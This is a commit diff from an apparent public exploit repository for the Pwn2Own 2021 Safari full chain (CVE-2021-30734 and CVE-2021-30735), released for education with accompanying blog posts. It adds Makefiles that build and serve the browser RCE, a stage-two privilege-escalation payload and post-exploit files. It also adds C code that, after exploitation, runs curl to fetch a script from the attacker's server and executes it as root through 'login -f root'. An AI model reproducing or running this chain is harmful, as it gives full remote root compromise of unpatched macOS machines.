add eop

Author: jman3323

Makefile

@@ -0,0 +1,55 @@
+# set pipefail so piped commands' errors arent ignored
+SHELL = /bin/bash -o pipefail
+
+SCFLAGS = -Wall -c -Os -fno-stack-protector -mno-sse -fno-unwind-tables -fno-exceptions
+
+.PHONY: help
+help:
+	@echo "servers:"
+	@echo '  `make rce IP=<thrower ip>` to build/serve rce'
+	@echo '  `make stage2` to serve stage2 eop'
+	@echo '  `make postexploit` to serve post-exploit files'
+	@echo ''
+	@echo 'rebuilding:'
+	@echo '  `make rce-build` to re-determine jsc offsets (must have same version of Safari as target machine)'
+	@echo '  `make stage2-build` to recompile eop from source'
+	@echo '  `make postexploit-build` to recompile post-exploit from source'
+	@echo '  `make rebuild` to rebuild all 3'
+
+.PHONY: rce
+rce: ip
+	cd rce && python3 gen_wasm.py -ip $(IP) && python3 -m http.server 1717
+
+.PHONY: ip
+ip:
+ifndef IP
+	$(error server IP not set, run make IP=...)
+endif
+
+.PHONY: stage2
+stage2:
+	cd rce && python3 stage2_server.py ../eop.bin
+
+.PHONY: postexploit
+postexploit:
+	cd eop/postexploit && python3 -m http.server 5151
+
+.PHONY: rce-build
+rce-build:
+	cd rce && python3 gen_wasm.py -offs prod
+
+.PHONY: stage2-build
+stage2-build:
+	make -C eop ksc
+	clang -E eop.c | sed $$'s/__NLHASH__/\\\n#/g' | clang -x c - -o eop.o $(SCFLAGS)
+	clang -E eop/eop_common.c -DFULLCHAIN | sed $$'s/__NLHASH__/\\\n#/g' | clang -x c - -o eop_common.o $(SCFLAGS)
+	ld eop.o eop_common.o -o eop.dylib -dylib
+	python objcopy.py eop.dylib eop.bin
+	rm eop.o eop.dylib eop_common.o
+
+.PHONY: postexploit-build
+postexploit-build:
+	cd eop/postexploit && make
+
+.PHONY: rebuild
+rebuild: rce-build stage2-build postexploit-build

README.md

@@ -1,10 +1,11 @@
-# Pwn2Own 2021 - Safari RCE
+# Pwn2Own 2021 - Safari Full Chain
 
 This repo contains exploit source code used by [RET2 Systems](https://twitter.com/ret2systems) at [Pwn2Own 2021](https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results).
-It has been released for educational purposes, with an accompanying [blogpost](https://blog.ret2.io/2021/06/02/pwn2own-2021-jsc-exploit).
+It has been released for educational purposes, with accompanying blogposts for the [RCE](https://blog.ret2.io/2021/06/02/pwn2own-2021-jsc-exploit) and [EOP](https://blog.ret2.io/2022/06/29/pwn2own-2021-safari-sandbox-intel-graphics-exploit/).
 
 The exploit was demonstrated on Safari 14.0.3, macOS Big Sur 11.2.3.
-The vulnerability was patched in Safari 14.1.1, assigned CVE-2021-30734.
+The Safari vulnerability was patched in Safari 14.1.1, assigned CVE-2021-30734.
+The Intel graphics driver vulnerability was patched in macOS Big Sur 11.4, assigned CVE-2021-30735.
 
 # License
 

eop.c

@@ -0,0 +1,12 @@
+#include "eop/eop_common.h"
+#include "fullchain.h"
+
+void _start() {
+    exploit();
+    printf("done\n");
+    char ip[32];
+    sprintf(ip, CSTR("%hhu.%hhu.%hhu.%hhu"), ipaddr[0], ipaddr[1], ipaddr[2], ipaddr[3]);
+    char cmd[512];
+    sprintf(cmd, CSTR("(curl -o /tmp/post.sh http://%s:5151/post.sh && chmod +x /tmp/post.sh && echo %s > /tmp/ip && login -f root /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal /tmp/post.sh) 2>&%u 1>&%u"), ip, ip, log_fd, log_fd);
+    system(cmd);
+}

eop/Makefile

@@ -0,0 +1,16 @@
+# set pipefail so piped commands' errors arent ignored
+SHELL = /bin/bash -o pipefail
+
+SCFLAGS = -Wall -c -Os -fno-stack-protector -mno-sse -fno-unwind-tables -fno-exceptions
+
+.PHONY: eop
+eop: ksc
+	clang eop.c eop_common.c -o eop -Wall -Os -framework IOKit -framework CoreFoundation
+
+.PHONY: ksc
+ksc:
+	clang kernel_sc.c -o kernel_sc.o $(SCFLAGS)
+	ld kernel_sc.o -o kernel_sc -dylib
+	python3 objcopy.py kernel_sc kernel_sc.bin
+	(echo GLOB && xxd -i kernel_sc.bin) | grep -v len > kernel_sc.h
+	rm kernel_sc.o kernel_sc kernel_sc.bin

eop/eop.c

@@ -0,0 +1,20 @@
+#include "eop_common.h"
+extern int sandbox_init_with_parameters(char*, int, char**, char**);
+
+int main(int argc, char** argv) {
+    if (argc >= 2 && !strcmp(argv[1], "-s")) {
+        char* errstr = 0;
+        char* params[] = {"HOME_DIR", 0, "WEBKIT2_FRAMEWORK_DIR", 0, "DARWIN_USER_CACHE_DIR", 0, "DARWIN_USER_TEMP_DIR", 0, "HOME_LIBRARY_PREFERENCES_DIR", 0, 0, 0};
+        for (int i = 0; params[i]; i+=2)
+            params[i+1] = "/tmp";
+        if (sandbox_init_with_parameters("/System/Library/Frameworks/WebKit.framework/Resources/com.apple.WebProcess.sb", 3, params, &errstr)) {
+            printf("couldnt init sandbox: %s\n", errstr);
+            return 1;
+        }
+        printf("initialized sandbox\n");
+    }
+    exploit();
+    printf("done\n");
+    system("curl -o /tmp/post.sh http://0.0.0.0:5151/post.sh && chmod +x /tmp/post.sh && echo 0.0.0.0 > /tmp/ip && login -f root /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal /tmp/post.sh");
+    return 0;
+}